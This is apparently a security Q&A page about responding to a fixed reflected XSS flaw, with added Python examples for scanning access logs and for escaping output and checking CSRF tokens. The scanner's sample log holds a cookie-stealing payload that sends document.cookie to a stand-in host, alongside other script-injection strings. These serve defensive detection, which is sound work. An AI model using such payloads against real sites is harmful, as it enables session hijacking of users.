
I found reflected XSS on my website, and it's fixed now. There are a lot of websites that tell you how an XSS can be detected or what can be compromised, but I could not find what measures should be taken after an XSS has been found. I know what an attacker can do using an XSS. Basically, all the cookies and session info can be compromised.

  1. How do I find out what was compromised? (I suppose there is no way to find this out, but I want to be sure if there is a way.)
  2. What should I do to mitigate the damage done to my website, if any?
TheRookierLearner

2 Answers


The first step is to patch the vulnerability by escaping any HTML entities or removing any dangerous characters altogether.

Reflected XSS is a client-side attack method, caused by a server side vulnerability. I wouldn't worry too much about any damages if you didn't catch an XSS worm in action or actually saw anyone using the exploit to attack other users. Just because you found a vulnerability in your code doesn't necessarily mean it has been exploited.

Most often XSS bugs aren't looked for as quickly as something like SQL injection or server-side code execution, which has a far more devastating impact, as it hits the server rather than the client. You could try looking in your web server's logs, or query your database for any strange characters such as < or >, which are often required to perform XSS-based attacks.

Another way to prevent stolen cookies from being re-used is to force all your users to re-authenticate.

k1DBLITZ
Paradoxis
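The log search the answer above suggests, as an added example that is not part of the original answer: a Python scanner over access-log lines in the Apache/nginx "combined" format that URL-decodes every query parameter (including double encoding) and flags the indicators a reflected payload usually needs once decoded. The log lines are constructed for the example, and the indicator list is an editor's assumption about what is worth flagging, not something the answer specifies.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample in Apache/nginx "combined" log format; not real traffic.
# Line 2 is a cookie-stealing payload, line 3 the same idea double-URL-encoded,
# line 4 a benign query that merely contains '<'.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=shoes HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=%3Cscript%3Enew%20Image().src%3D%22http%3A%2F%2Fevil.example%2F%3Fc%3D%22%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 5311 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:57:12 +0000] "GET /search?q=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 5290 "http://evil.example/lure" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:58:40 +0000] "GET /search?q=a+%3C+b HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# What a reflected payload usually needs once decoded. A bare '<' is not
# enough on its own: a browser only opens a tag when a tag name follows
# immediately, so "a < b" is left alone.
INDICATORS = [
    ("html_tag", re.compile(r"</?[a-z]", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript_uri", re.compile(r"javascript\s*:", re.I)),
    ("cookie_access", re.compile(r"document\.cookie", re.I)),
]


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded payloads become visible."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_access_log(log_text):
    """Return one hit per query parameter whose decoded value looks like markup or script."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m.group("target")).query
        for param, raw in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(raw)
            matched = [label for label, rx in INDICATORS if rx.search(value)]
            if matched:
                hits.append({
                    "line": lineno,
                    "ip": m.group("ip"),            # the victim's address, not the attacker's
                    "time": m.group("time"),
                    "referer": m.group("referer"),  # may point at the lure page
                    "param": param,
                    "value": value,
                    "indicators": matched,
                })
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"line {hit['line']} {hit['ip']} {hit['param']}={hit['value']!r} -> {hit['indicators']}")
```

Two caveats when reading the hits: in a reflected attack the request is made by the victim's browser, so the IP is the victim's and the Referer (when present) is the more useful clue about where the link came from; and payloads delivered in POST bodies, URL fragments (`#...`) or request headers never reach the access log at all, so an empty result from this scan is not proof that nothing happened.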

What should I do to mitigate the damage?

Usually, it is the user's browser that is compromised by XSS vulnerabilities on web sites. You probably won't see any damage done to your site, especially since it was reflected XSS. The attacker would need to target each user separately and convince them to click a malicious link in an email or visit a malicious domain that could launch the attack.

That said, reflected XSS is sneaky and can be combined with other attacks (like CSRF), and that CAN damage a web site. Let's say I achieve a reflected XSS attack that rewrites all the links on the page to links that can change things on your site. For example, rewrite links to www.example.com/records?record_id=3&action=delete. Now you have a script that can delete records under the authority of whatever user has had their browser compromised by XSS.

I don't believe too many web site owners do a lot of investigation when they find and fix an XSS problem unless there is evidence of an actual exploit.

How to Find out What was Compromised:

If your application writes detailed logs, you might have records of http requests with malicious scripts in the parameters.

If any users have complained that their stuff has been altered or deleted without their consent, that might also be a clue that someone has taken advantage of the XSS.

For more information, please describe what your web application does and what technologies it uses. You could even post a link to it if you don't mind the attention. That would give the people here more to go on.

Benoit Esnard
mcgyver5
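The link-rewriting scenario above, with the two fixes it calls for, as an added example written for this page rather than taken from the answer: output-encode the reflected parameter so the script is never injected in the first place, and make state-changing actions such as the delete require a POST carrying a per-session CSRF token instead of a bare GET link. The `/records` handler, its parameters, the in-memory store and the session dict are hypothetical stand-ins for whatever framework the site uses.

```python
import hmac
import html
import secrets

# --- Layer 1: output encoding, the actual fix for the reflected parameter ----

def render_search_vulnerable(query):
    """The flawed pattern: user input dropped into HTML unescaped."""
    return f'<h1>Results for {query}</h1>\n<input name="q" value="{query}">'


def render_search(query):
    """Same page with the parameter HTML-escaped. quote=True also encodes " and ',
    which the attribute context needs; html.escape(query) alone would still let
    a payload break out of value="...".
    """
    safe = html.escape(query, quote=True)
    return f'<h1>Results for {safe}</h1>\n<input name="q" value="{safe}">'


# --- Layer 2: no state change on GET, and none without a CSRF token ----------

def new_csrf_token():
    """Generate a token to store in the user's server-side session and embed in forms."""
    return secrets.token_urlsafe(32)


def handle_records(store, method, params, form, session):
    """Hypothetical /records handler. Returns (http_status, body).

    store:   dict record_id -> record (stands in for the database)
    params:  query-string parameters, e.g. {"record_id": "3", "action": "delete"}
    form:    POST body fields
    session: this user's server-side session, holding "csrf_token"
    """
    record_id = params.get("record_id")
    if params.get("action") != "delete":
        return 200, str(store.get(record_id, "no such record"))

    # A rewritten <a href="...?action=delete"> can only ever issue a GET.
    if method != "POST":
        return 405, "delete requires POST"

    # Constant-time comparison against the token issued to this session.
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, "missing or invalid CSRF token"

    if record_id not in store:
        return 404, "no such record"
    del store[record_id]
    return 200, f"deleted {record_id}"


if __name__ == "__main__":
    payload = '"><script>alert(1)</script>'
    print(render_search_vulnerable(payload))
    print(render_search(payload))
    store = {"3": {"owner": "alice"}}
    session = {"csrf_token": new_csrf_token()}
    delete = {"record_id": "3", "action": "delete"}
    print(handle_records(store, "GET", delete, {}, session))
    print(handle_records(store, "POST", delete, {"csrf_token": session["csrf_token"]}, session))
```

Be clear about what the second layer buys you: script that is already running in your origin can read the token out of the page and POST it itself, so the CSRF token stops plain CSRF and the crude link rewrite described above, not XSS as such. The output encoding is what removes the XSS, and it has to match the context the value lands in (HTML body, attribute, JavaScript string, URL); a single global escape is not enough on its own.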